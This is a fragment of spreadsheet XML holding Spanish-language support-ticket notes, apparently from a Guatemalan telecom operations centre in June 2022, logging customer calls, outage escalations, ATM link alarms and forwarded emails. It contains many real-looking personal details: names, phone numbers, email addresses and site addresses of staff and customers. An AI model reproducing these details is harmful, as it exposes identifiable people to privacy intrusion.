    <t>F4589029</t>
  </si>
  <si>
    <t>SE HABLO CON EL CLIENTE JAZMIN RODRIGUEZ QUIEN INDICA QUE TIENE RUIDO EN LAS LLAMADAS EXTERNAS EN AMBAS VIAS.
CLIENTE SOLICITA UNA VISITA TECNICA. PERO EL DIA DE HOY SE RETIRA A LAS 16:45HRS. SOLICITA QUE SE REALICE EL DIA DE MAÑANA A LAS 8:00AM
NO SE REQUIEREN PERMISOS DE ACCESO.
1001130276
COLA:
NOMBRE: A: 0050378623842
NÚMERO: 0050378623842
DURACIÓN: 0:00:45
ESTADO: CONECTADA
DETALLES: 0050378623842
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 3/06/2022 14:27:49</t>
  </si>
  <si>
    <t>SE LLAMA AL GDN 23622500, ATIENDE YESENIA MARTÍNEZ PERO NO TIENE CONOCIMIENTO DE LA FALLA Y COMENTA QUE JAZMIN RODRIGUEZ ESTA EN SU HORA DE ALMUERZO, SOLICITA QUE SE LE LLAME DESPUÉS DE LAS 14:00 HORAS
1001115066
COLA:
NOMBRE: A: 0050323622500
NÚMERO: 0050323622500
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DURACIÓN: 0:01:37
DETALLES: 0050323622500
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSEGODINEZ
FECHA Y HORA LOCALES: 3/06/2022 13:35:41</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE RODRIGUEZ JAZMIN 78623842 PERO NO CONTESTA Y ENVÍA A BUZÓN, SE INTENTARA EN UNOS INSTANTES
1001114293
1001114416
1001114548</t>
  </si>
  <si>
    <t>SE LLAMO AL NUMERO DEL GDN Y LA LLAMADA COMPLETA.
SE SOLICITA HABLAR CON EL CLIENTE JAZMIN RODRIGUEZ PARA SABER QUE REPORTA.
CLIENTE NO CONTESTO LA EXTENSION.
1001129707
COLA:
NOMBRE: A: 0050323622500
NÚMERO: 0050323622500
DURACIÓN: 0:00:26
ESTADO: CONECTADA
DETALLES: 0050323622500
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 3/06/2022 14:26:00</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  RODRIGUEZ JAZMIN 78623842 - 23622517 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001107205 - 1001107458</t>
  </si>
  <si>
    <t>F4589030</t>
  </si>
  <si>
    <t>SE ESTÁ CONSULTANDO AVANCES DEL TICKET A CNOC CLARO VÍA SKYPE, CASO ESCALADO CON INGENIERÍA CLARO.</t>
  </si>
  <si>
    <t>F4589031</t>
  </si>
  <si>
    <t>F4589036</t>
  </si>
  <si>
    <t>SE LLAMA A BYRON PARA SOLICITAR APOYO CON DATOS DE SIM PERO NO RESPONDE ----</t>
  </si>
  <si>
    <t>F4589038</t>
  </si>
  <si>
    <t xml:space="preserve">
ENLACE CONTINUA CAIDO, SE ENVIA MAIL NUEVAMENTE SOLICITANDO LA REVISION DEL ATM
DE: BARBARA ISABEL APARICIO MORALES &lt;BARBARA.APARICIO@CLARO.COM.GT&gt;ENVIADO: SÁBADO, 4 DE JUNIO DE 2022 13:04PARA: JUAN PABLO MORALES BARRONDO &lt;JUANPA.MORALES@CLARO.COM.GT&gt;; MONITOREOFALLASATM@5B.COM.GT &lt;MONITOREOFALLASATM@5B.COM.GT&gt;; SERVICIOS5B@5B.COM.GT &lt;SERVICIOS5B@5B.COM.GT&gt;CC: SERVICIOS5B@TYT.COM.GT &lt;SERVICIOS5B@TYT.COM.GT&gt;; JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; SILDA ANABELLA SALAZAR ALVAREZ &lt;SILDA.SALAZAR@CLARO.COM.GT&gt;; ANGEL ARMANDO CLAVEL TOLEDO &lt;ANGEL.CLAVEL@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; DAVID ANDREE LARRAÑAGA CHINCHILLA &lt;DAVID.LARRANAGA@CLARO.COM.GT&gt;; THELMA SUHEYDI PAPPA AGUIRRE &lt;THELMAS.PAPPA@CLARO.COM.GT&gt;; CESAR RIGOBERTO LEAL OLIVA &lt;CESARR.LEAL@CLARO.COM.GT&gt;; DARLING ELISABET ALVAREZ IBOY &lt;DARLING.ALVAREZ@CLARO.COM.GT&gt;ASUNTO: RE: CAJEROS ATM ATM3272 CAIDA DE SERVICIO
BUEN DIA ESTIMADOS, SOLICITAMOS SU APOYO CON LA REVISION DEL ATM COMO SE INDICA EN EL MAIL QUE ANTECEDE. DICHO ATM TIENE UNA ALARMA DE 24HRS.
DE ANTEMANO MUCHAS GRACIAS,
SALUDOS.
DE: JUAN PABLO MORALES BARRONDO &lt;JUANPA.MORALES@CLARO.COM.GT&gt;ENVIADO: VIERNES, 3 DE JUNIO DE 2022 12:59PARA: MONITOREOFALLASATM@5B.COM.GT &lt;MONITOREOFALLASATM@5B.COM.GT&gt;; SERVICIOS5B@5B.COM.GT &lt;SERVICIOS5B@5B.COM.GT&gt;CC: SERVICIOS5B@TYT.COM.GT &lt;SERVICIOS5B@TYT.COM.GT&gt;; JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; SILDA ANABELLA SALAZAR ALVAREZ &lt;SILDA.SALAZAR@CLARO.COM.GT&gt;; ANGEL ARMANDO CLAVEL TOLEDO &lt;ANGEL.CLAVEL@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; DAVID ANDREE LARRAÑAGA CHINCHILLA &lt;DAVID.LARRANAGA@CLARO.COM.GT&gt;; THELMA SUHEYDI PAPPA AGUIRRE &lt;THELMAS.PAPPA@CLARO.COM.GT&gt;; CESAR RIGOBERTO LEAL OLIVA &lt;CESARR.LEAL@CLARO.COM.GT&gt;; DARLING ELISABET ALVAREZ IBOY &lt;DARLING.ALVAREZ@CLARO.COM.GT&gt;ASUNTO: CAJEROS ATM ATM3272 CAIDA DE SERVICIO
ESTIMADO CLIENTE,
TENEMOS ALARMA CON RESPECTO AL SERVICIO DEL ATM: ATM3272¿¿¿¿¿¿¿¿¿¿¿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9038¿¿
ID: 806300045T¿
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM3272¿
UBICADO EN:
(ATM 3272) PLAZA EL AMATE 6 - 18 CALLE ENTRE 4A Y 5TA AVE. ZONA 1
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIO.
SALUDOS.
TORRE_CAFE#
TORRE_CAFE#PING VRF TYT  192.168.154.166
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 5, 100-BYTE ICMP ECHOS TO 192.168.154.166, TIMEOUT IS 2 SECONDS:
.....
SUCCESS RATE IS 0 PERCENT (0/5)
TORRE_CAFE#</t>
  </si>
  <si>
    <t>F4589041</t>
  </si>
  <si>
    <t>EN GESTION CON TECNCIO SE REALIZAN PRUEBAS SOBRE EQUIPO CTC Y SW ACCESO.. SE VE PUERTO UP 0/2/19 AUN DESCONECTANDO EL CABLE, POR LO QUE SE DETERMINA INTERFACE INHIBIDA, SE SOLICITA APOYO A BOIP,</t>
  </si>
  <si>
    <t>PUERTO ACCESO SE ENCONTRABA INHIBIDO SE APLICA RESET Y LEVANTA GESTION DE CTC NO SE TIENE RESPUESTA DE WAN YA QUE CLIENTE APAGA EQUIPOS</t>
  </si>
  <si>
    <t>F4589045</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 45787911 PARA SEGUIMIENTO, NO CONTESTA; EN CRONO MÁS RECIENTE DE FALLA INDICAN QUE CLIENTE SOLICITÓ GRÁFICAS DESDE LAS 08:00AM HASTA ESTA HORA; SEGÚN CRONO DE GESTOR CNOC NO HAY EQUIPOS MERAKI EN CLIENTE, SE COPIA A SOC CLARO:
ASUNTO: RE: C652 - INTERNET CLARO - 671900144</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WALTER ANIBAL REYES AL 45787911 SOLICITA QUE SE LE ENVIEN GRAFICAS DESDE LAS 8:00 AM A LA HORA QUE SE GENEREN || SE NOTIFICA A GESTOR **
ID 1001102056
**</t>
  </si>
  <si>
    <t>F4589073</t>
  </si>
  <si>
    <t>SE SOLICITA APOYO NUEVAMENTE, ES NECESARIO REINICIAR LOS EQUIPOS YA QUE POSIBLEMENTE ESTEN INHIBIDOS, VLAN TAGGEADA EN CTC LOCAL Y REMOTO, NO SE REPORTA MAC ADDRESS, SE REALIZA PRUEBAS CAMBIANDO NEGOCIACIONES EN CTC REMOTO PERO NO LOGRA RESTABLECER.
KENNY ROBERT RIVERA JUAREZ
ESTIMADO CLIENTE,
EN SEGUIMIENTO AL ENLACE ALARMADO EN NUESTRO MONITOREO PARA LA AGENCIA CC_CREDOMATIC_GT_INTERNET_AGENCIA_0089, SOLICITAMOS SU APOYO CON LO REQUERIDO EN CORREO ANTERIOR.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>SE LLAMO A EDUARDO SAQUICH SE LE COMENTO LA SITUACIÓN DEL ENLACE, SE LE INDICO QUE SE ENVIO CORREO PARA SOLICITAR CONTACTOS DEL PUNTO REMOTO, INDICA QUE EL CORREO TELEMATICAGT@CREDOMATIC.COM &lt;TELEMATICAGT@CREDOMATIC.COM&gt; NO ES CORRECTO SE ENVIO CORREO A GRUPO TELEMATICAGT@CREDOMATIC.GT INDICA QUE POSIBLEMENTE SEA CONTESTADA EL DIA LUNES PORQUE CULMINARON JORNADA LABORAL, IGUAL SE ESTARA AL PENDIENTE DE RESPUESTA DEL CLIENTE.
RESULTADO: LLAMADA HECHA
NOMBRE: 59519771
NÚMERO: 59519771
INICIO: HOY, 17:01
FIN: HOY, 17:06
DURACIÓN: 4:11
ID DE LLAMADA: 2001529406
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: VIERNES, 10 DE JUNIO DE 2022 17:06PARA: TELEMATICAGT@CREDOMATIC.GT &lt;TELEMATICAGT@CREDOMATIC.GT&gt;ASUNTO: RV: ENLACE ALARMADO PARA EL CLIENTE CREDOMATIC S.A.
++
DE: KENNY ROBERT RIVERA JUAREZ &lt;KENNY.RIVERA@CLARO.COM.GT&gt;ENVIADO: VIERNES, 3 DE JUNIO DE 2022 20:54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CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;ASUNTO: ENLACE ALARMADO PARA EL CLIENTE CREDOMATIC S.A.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89073
ID: 8600208T
IDENTIFICADOR DEL CLIENTE:  CC_CREDOMATIC_GT_INTERNET_AGENCIA_0089
UBICADO EN:  INTERNET_CALZADA ROOSEVELT 32-26, ZONA 7, GUATEMALA, GUATEMALA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>SE ENVIA CORREO NUEVAMENTE
DE: MONICA ESTEFANIA BETSABE MARROQUIN SHUTUC &lt;MONICAE.MARROQUIN@CLARO.COM.GT&gt;
ENVIADO: LUNES, 13 DE JUNIO DE 2022 13:39
PARA: TELEMATICAGT@BACCREDOMATIC.GT &lt;TELEMATICAGT@BACCREDOMATIC.GT&gt;;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DREGALADOC@BACCREDOMATIC.GT &lt;DREGALADOC@BACCREDOMATIC.GT&gt;; LCASTANEDAC@BACCREDOMATIC.GT &lt;LCASTANEDAC@BACCREDOMATIC.GT&gt;; TELEMATICAGT@CREDOMATIC.GT &lt;TELEMATICAGT@CREDOMATIC.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; JUAN MANUEL CARDONA SALAMA &lt;JUANM.CARDONA@CLARO.COM.GT&gt;; GERIZIM SINAI RAMIREZ CALDERON &lt;GERIZIM.RAMIREZ@CLARO.COM.GT&gt;
ASUNTO: RE: ENLACE ALARMADO PARA EL CLIENTE CREDOMATIC S.A.
ESTIMADO CLIENTE,
LE SALUDO CORDIALMENTE, AL MISMO TIEMPO SOLICITO SU ACOSTUMBRADO APOYO BRINDANDO CONTACTOS DE LA SIGUIENTE AGENCIA:
TICKET:  F4589073
ID: 8600208T
IDENTIFICADOR DEL CLIENTE:  CC_CREDOMATIC_GT_INTERNET_AGENCIA_0089
UBICADO EN:  INTERNET_CALZADA ROOSEVELT 32-26, ZONA 7, GUATEMALA, GUATEMALA
ESTO DEBIDO A QUE TENEMOS UNA ALARMA PROACTIVA SOBRE LA CAÍDA DEL SERVICIO.
DE ANTEMANO MUCHAS GRACIAS POR EL APOYO.
SALUDOS,</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. FELIPE SAQUICH  2361-0909 EXT 4368 INFORMA QUE YA REALIZARON DESCARTES DE PRIMER NIVEL, VALIDARON EQUIPOS ENCENDIDOS, Y RESET  PERO ENLACE AUN NO LEVANTA,  NO AUTORIZA MAS PRUEBAS YA QUE PERSONAL DEL SITIO REMOTO NO ES TECNICO ESPECIALIZADO EN EQUIPO DE RED, SOLICITA VISITA PARA MAÑANA MARTES A LAS  9 AM</t>
  </si>
  <si>
    <t>SE LLAMA A CONTACTO ESTUARDO TOMAS AL NUMERO 55111669 PERO NO SE TIENE RESPUESTA, ENVIA A BUZON LA LLAMADA..
2001487259
COLA:
NOMBRE: A: 55111669
NÚMERO: 55111669
DURACIÓN: 0:00:40
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 55111669
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 10/06/2022 14:35:19</t>
  </si>
  <si>
    <t>SE LLAMA NUEVAMENTE A ESTUARDO SAQUICH QUIEN INDICA QUE SE ANOTO MAL NUEVAMENTE EL CORREO POR LO QUE VUELVE A CORREGIR  TELEMATICAGT@BACCREDOMATIC.GT
RESULTADO: LLAMADA HECHA
NOMBRE: 59519771
NÚMERO: 59519771
INICIO: HOY, 13:20
FIN: HOY, 13:23
DURACIÓN: 3:30
ID DE LLAMADA: 2001899760</t>
  </si>
  <si>
    <t>SE INTENTA LLAMAR A ESTUARDO TOMAS AL NUMERO 55111669 PERO NO SE TIENE RESPUESTA
2001454490
COLA:
NOMBRE: A: 55111669
NÚMERO: 55111669
DURACIÓN: 0:00:40
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 55111669
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MONICAMARROQUIN
FECHA Y HORA LOCALES: 10/06/2022 12:44:59
2001455106
COLA:
NOMBRE: A: 55111669
NÚMERO: 55111669
DURACIÓN: 0:00:41
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 55111669
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MONICAMARROQUIN
FECHA Y HORA LOCALES: 10/06/2022 12:46:19</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE, SOLICITANDO COORDINACION PARA MAÑANA A LAS 9:00HRS
DE: CARLOS EDGARDO ICHEL ESCOBAR &lt;CARLOS.ICHEL@CLARO.COM.GT&gt;
ENVIADO: LUNES, 13 DE JUNIO DE 2022 16:38
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; FELIPE ESTUARDO SAQUICH COYOY &lt;FESAQUICH@BACCREDOMATIC.GT&gt;; MONICA ESTEFANIA BETSABE MARROQUIN SHUTUC &lt;MONICAE.MARROQUIN@CLARO.COM.GT&gt;; TELEMATICAGT &lt;TELEMATICAGT@BACCREDOMATIC.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;; JUAN MANUEL CARDONA SALAMA &lt;JUANM.CARDONA@CLARO.COM.GT&gt;; GERIZIM SINAI RAMIREZ CALDERON &lt;GERIZIM.RAMIREZ@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: ENLACE ALARMADO PARA EL CLIENTE CREDOMATIC S.A.
BUENAS TARDES APRECIABLE CLIENTE
SOLICITAMOS DE SU APOYO COORDINANDO ACCESOS A NUESTRO SIGUIENTE PERSONAL PORFAVOR.
SE HA COORDINANDO VISITA PARA EL DÍA DE MAÑANA A LAS 9:00HR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HECTOR MISAEL RAMIREZ CARDONA 710125 2249 23862 0101</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 23610909 EXT 4368 PARA APOYO A TRAMITAR EL INGRESO DE TÉCNICO A PR MAÑANA A LAS 09:00AM, NO CONTESTA; SEGUIMIENTO PARA MAÑANA A TAL HORA.</t>
  </si>
  <si>
    <t>SE NOTIFICA ALARMA EN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89073
ID: 8600208T
IDENTIFICADOR DEL CLIENTE:  CC_CREDOMATIC_GT_INTERNET_AGENCIA_0089
UBICADO EN:  INTERNET_CALZADA ROOSEVELT 32-26, ZONA 7, GUATEMALA, GUATEMALA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4589087</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 78596500 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001139680</t>
  </si>
  <si>
    <t>SE LLAMA A PR  78596500 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001150636</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL WALTER REYES 45787911 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001149783</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 78596500  NO RESPONDE || SE INTENTARA LUEGO **
ID 1001158023
**</t>
  </si>
  <si>
    <t>F4589095</t>
  </si>
  <si>
    <t>CLIENTE OSCAR CHACON 31868308 INDICA QUE PRESENTA CORTE DE LLAMADAS, INDICA QUE YA REINICIÓ LOS EQUIPOS. SOLICITA VISITA TÉCNICA PARA MAÑANA A LAS 8 AM. NO  ES NECESARIO TRAMITAR PERMISOS.</t>
  </si>
  <si>
    <t>CLIENTE OSCAR CHACON 31868308 VALIDA QUE EL SERVICIO EL SERVICIO ESTÁ OPERATIVO Y ESTABLE, AUTORIZA EL CIERRE DEL CASO. ID: 1001221607</t>
  </si>
  <si>
    <t>OSCAR CHACÓN/CLIENTE 31868308 INDICA QUE NO ES NECESARIO TRAMITAR PERMISOS, PERO LOS TÉCNICOS DEBEN IR IDENTIFICADOS PARA DEJARLOS INGRESAR EN GARITA.</t>
  </si>
  <si>
    <t>F4589116</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 51984672 - 51985085 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001152238 - 1001152404</t>
  </si>
  <si>
    <t>SE VALIDA QUE EL SERVICIO ESTA OPERATIVO DE NUESTRO LADO Y SIN CORRECCIÓN POR PARTE DE CLARO POSIBLE CORTE DE ENERGÍA CAUSO LA AFECTACIÓN SE LLAMA AL PR AURA MARIA BRAN AL  5826-2517 PERO COMENTA QUE NO LABORA MAS PARA LA EMPRESA Y SE LLAMA AL CL ORLANDO RAMIREZ AL 2420-7200 EXT 2351 ID 1001232772 NO INGRESA / SE LLAMA SIN LA EXT 1001233131 ATIENDE WALTER Y SE LE BRINDA LA INFORMACIÓN Y COMENTA QUE  EL PR NO LABORA PARA LA EMPRESA Y NO RESPONDE ORLANDO A SU EXT Y COMENTA QUE ESTA MAL YA QUE ES 2359 TRASLADA AL CL Y SE LE BRINDA LA INFORMACIÓN Y COMENTA QUE LO VE ABAJO SE TRANSFIERE CON EL GESTOR JOSE.OCHOA AL 8126 ID 1001234687 SE DEJA CON EL CL EN LINEA</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE 51984672 - 51985085 NO RESPONDE, SE INTENTARA LUEGO **
ID 1001158789 - 1001158880
**</t>
  </si>
  <si>
    <t>F4589123</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 78550321 MENCIONA QUE EL WIFI ES MUY INESTABLE, SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 1001153103</t>
  </si>
  <si>
    <t>F4589136</t>
  </si>
  <si>
    <t>*** SE HABLA CON ERIZA MENDOZA 504 98471310 (ID 1001263526), CONFIRMA QUE YA OBSERVA OPERATIVO EL SERVICIO ***</t>
  </si>
  <si>
    <t>F4589144</t>
  </si>
  <si>
    <t>SE LLMA A CLIENTE OLGA AYALA-26844900  COEMTNA QUE EL PROBLEMA QUE TIENE ES QUE DE LA MAYORIA DE EXTENSIONES NO TIENE SALIENTES Y QUE SOLOO UNA EXTENSION SI LE ESTAN ENTRANDO## SE LE COMENTA A CLIENTE QUE ESO ES PROBLEMA DE SU PBX DEBIDO A QUE CLARO ENTREGA EN SU TOTALIDAD EL E1. ENTONCES  SOLO EXISTE UN  SI O NO CON LA ENTREGA DE LLAMADAS. ##CLIENTE QUEDA ENTERADO Y ESCAL A SU SOPORTE DE PBX ##VIVO</t>
  </si>
  <si>
    <t>F4589155</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL ROSA ELIET / 57539670 NO RESPONDE SE INTENTARA LUEGO**
ID 1001154161
**</t>
  </si>
  <si>
    <t>F4589157</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL ALFREDO AL 89201724 INDICA QUE SI TIENE CONEXION PERO NO RECIBE NI ENVIA || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
ID 1001151287 - 1001152511
**</t>
  </si>
  <si>
    <t>F4589183</t>
  </si>
  <si>
    <t>SE HABLÓ CON CHRISTIAN CANALES/CLIENTE 00 525551745299 INDICA ENLACE OK, AUTORIZA CIERRE DEL TICKET.</t>
  </si>
  <si>
    <t>F4589190</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE MIGUEL CALLES O  ERICK MENDEZ 76810422 Y 24459214 PARA REALIZAR PRUEBAS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE LLAMO AL NUMERO DEL GDN Y LA LLAMADA COMPLETA.
SE SOLICITA HABLAR CON EL CLIENTE MIGUEL CALLES.  CLIENTE INDICA QUE TENIA MALA LA IP DE LA PBX. SE MODIFICA Y POSTERIORMENTE VALIDA EL SERVICIO.
1001143413
COLA:
NOMBRE: A: 0050323192450
NÚMERO: 0050323192450
DURACIÓN: 0:00:21
ESTADO: MARCANDO
DETALLES: 0050323192450
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 3/06/2022 15:13:11</t>
  </si>
  <si>
    <t>F4589194</t>
  </si>
  <si>
    <t>FALLA GENERAL F4589057/FALLA MASIVA F4589194:
ALARMAS DE PERDIDA DE SEÑAL ENTRE EL NODO 11500 ARISTOS, ESCLAVO 8 UNIDAD 3 IF 1 HACIA AURORA NODO 261 UNIDAD 3
SEGUIMIENTO DE LA FALLA:
SE ESCALÓ CON EDGAR BARRERA/TX CENTRO 58263682 INDICA QUE SE DIRIGE A NODO DE ARISTOS, PERO DEDUCE QUE EL PROBLEMA ES EN EL SHELTER DE AURORA QUE ESTÉ FUERA DE SERVICIO POR ENERGÍA, PUES DE ÉSTE SHELTER DEPENDE VARIOS SITIOS, EL CUAL INCLUYE ARISTOS.
SE ESCALA CON MELVIN SOLÓRZANO/TX PETAPA 58261501 INDICA QUE YA VA PERSONAL TÉCNICO A LOS SITIOS DE AURORA (RONALD CATALÁN) E HINCAPIÉ (MYNOR CABRERA), ESTIMA AVANCES EN DOS HORAS, DEPENDE EL TRÁFICO EN SECTOR.</t>
  </si>
  <si>
    <t>F4589210</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ARMANDO CHUC 35731989 MENCIONA QUE NO HA RECIBIDO EL CORREO
CLIENTE CONFIRMA EL CORREO -- ARMANDO.CHUC@PREMIUM.SV --
-ID 1001173918</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 3 DE JUNIO DE 2022 17:11
PARA: LESTER LEONEL RODAS MARROQUIN &lt;LESTERL.RODAS@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; ARMANDO.CHUC@PREMIUM.SV &lt;ARMANDO.CHUC@PREMIUM.SV&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; BRENDA MARISOL DE PAZ PEREZ &lt;BRENDA.DEPAZ@CLARO.COM.GT&gt;
ASUNTO: RE: F4589210 || PANACAFE GUATEMALA S.A. || DIAG.6 13-01 ZONA 10 C.C. OAKLAND MALL || 336800004T ||
*-*-*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  WILLIAM 42106014 WILLIAM MENCIONA QUE NO ES NECESARIO LOS PERMISOS
-ID 1001172923</t>
  </si>
  <si>
    <t>SE RECIBE CORREO DE CLIENTE AUTORIZANDO LOS PERMISOS:
DE: ARMANDO CHUC [MAILTO:ARMANDO.CHUC@PREMIUM.SV]
ENVIADO EL: VIERNES, 3 DE JUNIO DE 2022 17:19
ASUNTO: RE: F4589210 || PANACAFE GUATEMALA S.A. || DIAG.6 13-01 ZONA 10 C.C. OAKLAND MALL || 336800004T ||
SE SOLICITO POR PARTE DE LA UNIDAD AL CENTRO COMERCIAL LOS PERMISOS, DANDO COMO AUTORIZADOS, POR FAVOR PROCEDER A LA BREVEDAD POSIBLE.
JOSE ARMANDO CHUC
SISTEMAS / XELA.
MOBILE 3573-1989
EMAIL: ARMANDO.CHUC@PREMIUM.SV
QUETZALTENANGO, GUATEMALA C.A</t>
  </si>
  <si>
    <t>F4589242</t>
  </si>
  <si>
    <t xml:space="preserve">
SE TIENE A CLIENTE CELINA RODRIGUEZ EN LINEA, QUIEN APLICA REICIO A LOS EQUIPOS
1001148187
COLA:
NOMBRE: A: 0050374876562
NÚMERO: 0050374876562
DURACIÓN: 0:04:55
ESTADO: CONECTADA
DETALLES: 0050374876562
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 3/06/2022 15:33:53</t>
  </si>
  <si>
    <t>F4589244</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SONIA ARGUETA AL 78568883 NO RESPONDE || SE INTENTARA LUEGO **
ID 1001155731
**</t>
  </si>
  <si>
    <t>F4589265</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89265
ID: CONTR0001390645OC
IDENTIFICADOR DEL CLIENTE: CC_WALMART_CR_TIENDA_4417
UBICADO EN: DEL SERVICENTRO COLONO 50 METROS AL NORTER, MAXI PALI AGUAS ZARCAS
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4589281</t>
  </si>
  <si>
    <t>SE TIENE A CLIENTE EN LINEA
1001391653
COLA:
NOMBRE: A: 0050585107210
NÚMERO: 0050585107210
DURACIÓN: 0:01:33
ESTADO: CONECTADA
DETALLES: 0050585107210
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 5/06/2022 09:58:35</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE INDICA SERVICIO EMPIEZA A FALLAR A LAS 3-4 PM APROX INDICA QUE EN 40 MINUTOS ESTIMA LLEGAR A SITIO.---</t>
  </si>
  <si>
    <t>SE CONVERSA CON DRA FLORES, INDICA QUE NO LOGRA INGRESAR A LA SALA DE EQUIPOS YA QUE LA ADMINISTRADORA TIENE LAS LLAVES Y PODRIA ATENDER HASTA EL DIA DE MAÑANA EN HORARIO HABIL, POR LO QUE SOLICITA SE LE LLAME EL DIA DE MAÑANA PARA VALIDAR LAS PRUEBAS DE PRIMER NIVEL.
1001391653
COLA:
NOMBRE: A: 0050585107210
NÚMERO: 0050585107210
DURACIÓN: 0:05:19
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 0050585107210
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 5/06/2022 10:02:39</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE, INDICA QUE EN ESTE MOMENTO NO SE ENCUENTRA EN SITIO Y QUE SE LE MARQUE EN APROXIMADAMENTE 40 MINUTOS, PARA VALIDAR PRUEBAS DE PRIMER NIVEL.
1001384119
COLA:
NOMBRE: A: 0050585107210
